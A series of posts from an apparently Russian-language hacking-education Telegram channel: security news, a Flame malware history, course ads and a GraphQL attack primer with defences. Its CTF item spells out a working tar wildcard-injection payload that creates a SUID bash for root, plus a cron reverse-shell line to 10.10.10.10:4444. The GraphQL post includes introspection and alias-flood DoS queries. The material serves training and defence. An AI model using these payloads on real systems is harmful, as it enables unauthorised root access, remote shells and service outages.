🐧 Wildcard Injection Challenge

Сценарий: shell от www-data, sudo нет, SUID чистые.

Нашли cron:

* * * * * root cd /var/www/html && tar -czf /backups/site.tar.gz *

Права:

drwxrwxrwx 2 www-data www-data /var/www/html
-rwxr-xr-x 1 root root /opt/scripts/backup.sh

Цель: root shell через wildcard injection

❓ Какой payload положите в /var/www/html/:

🔥

echo "cp /bin/bash /tmp/r; chmod +s /tmp/r" > x.sh
chmod +x x.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=/bin/sh x.sh»

👾

ln -s /etc/shadow shadow.txt
tar -czf exploit.tar.gz shadow.txt

❤️

echo '* * * * * root bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' > /etc/cron.d/rev

🤩

chmod 777 /opt/scripts/backup.sh
echo "cp /bin/bash /tmp/r && chmod +s /tmp/r" > /opt/scripts/backup.sh

Подсказка: tar * раскроет имена файлов в аргументы. После срабатывания: /tmp/r -p → root.

🐸 Библиотека хакера

#ctf_challenge

😮😮

🐸 Библиотека хакера

#hack_humor

🔥 Подборка новостей

➡️ Критические уязвимости в Fluent Bit угрожают облачной инфраструктуре

Обнаружена цепочка из 5 критических уязвимостей в Fluent Bit — инструменте для сбора логов, развёрнутом более 15 миллиардов раз.

🔴 Ключевые CVE:

• CVE-2025-12972: path traversal через несанитизированные теги → запись произвольных файлов и RCE
• CVE-2025-12970: переполнение буфера в Docker-плагине через длинные имена контейнеров
• CVE-2025-12969: обход аутентификации в in_forward плагине

🔴 Масштаб: некоторые уязвимости присутствуют в коде более 8 лет. Затронуты AWS, Google Cloud, Azure, банки, AI-лаборатории.

🔴 Риски: полный контроль над логами, удаление следов атак, инъекция фальшивых событий, RCE, захват облачной инфраструктуры.

🔗 Oligo Security Research

➡️ CISA предупреждает о массовых атаках на Signal и WhatsApp

CISA выпустила предупреждение об активном использовании коммерческого шпионского ПО и RAT против пользователей мессенджеров.

🔴 Цели: действующие и бывшие высокопоставленные правительственные, военные и политические чиновники, а также организации гражданского общества в США, на Ближнем Востоке и в Европе.

🔴 Методы атак:
• Фишинг с поддельными QR-кодами для привязки устройств
• Zero-click эксплойты (включая CVE-2025-21042 для доставки Android-шпиона LANDFALL)
• Поддельные версии мессенджеров (ProSpy, ToSpy, ClayRat)

🔗 The Register

➡️ FBI: $262M убытков от Account Takeover атак в 2025

ФБР получило более 5,100 жалоб на мошенничество с захватом аккаунтов (ATO), приведшее к убыткам более $262 миллионов с начала года.

🔴 Тренд: киберпреступники выдают себя за сотрудников финансовых учреждений, используя AI для создания гипер-реалистичных фишинговых кампаний.

🔗 The Hacker News

🐸 Библиотека хакера

#patch_notes

🔓 Разбор задачи

В cron у root:

* * * * * root cd /var/www/html && tar -czf /backups/site.tar.gz *

Каталог доступен для записи www-data (777).
Команда tar * раскрывает имена файлов как аргументы. Если подложить файлы, имитирующие флаги, tar воспримет их как реальные параметры и выполнит произвольную команду от root.

🎯 Цель: получить root через SUID bash

Payload, который нужно поместить в /var/www/html:

echo "cp /bin/bash /tmp/r; chmod +s /tmp/r" > x.sh
chmod +x x.sh

touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=/bin/sh x.sh"

--checkpoint заставит tar выполнить x.sh в процессе архивации.
Скрипт создаёт /tmp/r — копию bash с SUID-битом.

После срабатывания cron:

/tmp/r -p

Вы получаете root.

➕ Побочные варианты из задачи не подходят:
запись в cron.d недоступна, shadow в архив ничего не даёт, backup.sh не перезаписать.

Правильный ответ: 🔥

🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib

🐸 Библиотека хакера

#ctf_challenge

🌸 Разведка источников

GitHub с PoC'ами — стандарт. HackerOne и Bugcrowd — база. Но половину инсайтов вы выцепили не оттуда.

Это мог быть разбор CVE в чьём-то блоге. Техника из старого write-up на CTFtime. Обсуждение в закрытом дискорде. Или канал в тг, где кто-то постит свежие находки раньше всех.

Что в вашем арсенале ❓

— Каналы и блоги, которые читаете первыми
— Источники PoC и exploit research
— Комьюнити, где делятся методологиями
— Исследователи, за которыми следите

Кидайте ссылки. Может, найдём что-то новое для себя 😠

🐸 Библиотека хакера

#resourse_drop

⚡️ Быстрый опрос для пентестеров

Кастомные скрипты для атак — вы:

❤️ — Пишу постоянно (почти каждый проект)
👍 — Пишу иногда (когда тулзы не подходят)
👾 — Писал пару раз (в основном готовые)
🔥 — Никогда не писал (зачем, если есть Metasploit?)

Интересно, сколько реально кодят vs просто запускают готовое.

🤌 Бонусы для подписчиков:
— Скидка 40% на все курсы Академии
— Розыгрыш Apple MacBook
— Бесплатный тест на знание математики

🐸 Библиотека хакера

#tool_vs_tool

🐸 Библиотека хакера

#hack_humor

👀 Шпион, который прятался на виду годами

Flame — это не вирус. Это полноценная платформа для киберразведки, которая превращала компьютер в жучок для прослушки.

📦 Аномальный размер

20 МБ — огромная редкость для вредоносного ПО (обычно 50-200 КБ).

Внутри:
— 20+ модулей с разными функциями
— Виртуальная машина Lua
— База данных SQLite для хранения украденных данных

🎯 Арсенал шпионажа:

• Скриншоты — снимки экрана при работе с мессенджерами и браузерами
• Аудиозапись — включение микрофона для записи разговоров
• Bluetooth-перехват — извлечение данных из телефонов поблизости
• Сетевой сниффинг — перехват паролей в локальной сети
• USB-распространение — заражение флешек для проникновения в изолированные сети

➕ Как его обнаружили:

2008-2010 — предполагаемое начало работы

Май 2012 — обнаружение Kaspersky Lab

Июнь 2012 — операторы отправили команду на самоуничтожение на большинство заражённых машин

🎥 Почему это важно:

✓ Работал незамеченным 2-4 года
✓ Модульная архитектура — мог адаптироваться под каждую цель
✓ Мог удалять все следы по команде
✓ Уровень разработки указывает на государственное финансирование

Flame показал новую эру кибершпионажа: вредоносное ПО как долгосрочная разведоперация. Цифровой жучок, живущий в компьютере годами и собирающий всё — от паролей до разговоров в комнате.

🤌 Бонусы для подписчиков:
— Скидка 40% на все курсы Академии
— Розыгрыш Apple MacBook
— Бесплатный тест на знание математики

🐸 Библиотека хакера

#zero_day_legends

📎 Бесплатная платформа для изучения этичного хакинга от HackerOne

Что внутри:

— Видеолекции о поиске уязвимостей и защите веб-приложений
— Практические руководства разного уровня сложности
— CTF-задачи — упражнения, где нужно взломать систему и найти спрятанный флаг

🔗 Все материалы в открытом доступе: можно учиться на сайте, смотреть ролики на YouTube или скачать с GitHub.

Отличный старт для тех, кто хочет освоить пентест и этичный хакинг! 👀

🤌 Бонусы для подписчиков:
— Скидка 40% на все курсы Академии
— Розыгрыш Apple MacBook
— Бесплатный тест на знание математики

🐸 Библиотека хакера

#resourse_drop

⚠️ GraphQL Security: атаки, которые работают прямо сейчас

GraphQL массово заменяет REST API, но его безопасность — слабое звено. Компании внедряют быстро, защищают медленно.

🔍 Почему GraphQL опаснее REST:

— один endpoint вместо множества → сложнее мониторить
— клиент сам формирует запрос → больше контроля атакующему
— introspection по умолчанию включен → полная карта API бесплатно

➡️ Как атакуют:

1. Introspection Mining
Запрос __schema выдает всю структуру API: типы, поля, аргументы. Даже если endpoint не документирован — получишь full disclosure.

{__schema{types{name,fields{name}}}}

2. Batching Attack
Один HTTP-запрос = 1000 GraphQL-операций. Rate limit обходится тривиально, можно брутить токены/пароли массово.

3. Alias Overloading
Запросить одно и то же поле 10000 раз под разными именами → DoS через CPU exhaustion.

{
  user1: user(id:1){name}
  user2: user(id:1){name}
  ...
  user9999: user(id:1){name}
}

4. Nested Query Bomb
Циклические зависимости в схеме (user→posts→author→posts...) → экспоненциальный рост запросов к БД.

5. Field Suggestions Leak
Опечатка в названии поля? GraphQL сам подскажет правильное — включая приватные поля, которые думали скрыть.

😵 Типичный сценарий атаки:

Пентестеры регулярно находят открытые GraphQL endpoints у SaaS-сервисов. Через introspection обнаруживают internal-запросы типа adminQuery или internalUserData, которые не были в публичной документации. Результат: массовая утечка данных клиентов.

🛡 Что делать defenders:

— 

отключить introspection в production

 (если не нужен публично)
— лимиты на 

query depth

 (макс. 5-7 уровней) и 

complexity

— 

persisted queries

 вместо arbitrary запросов
— мониторинг аномальных паттернов (>100 алиасов, батчинг >10 запросов)
— 

field-level authorization

, а не только endpoint-level

📎 Источники:

→ OWASP GraphQL Cheat Sheet
→ GraphQL Batching Attack
→ Exploiting GraphQL

🐸 Библиотека хакера

#breach_breakdown #graphql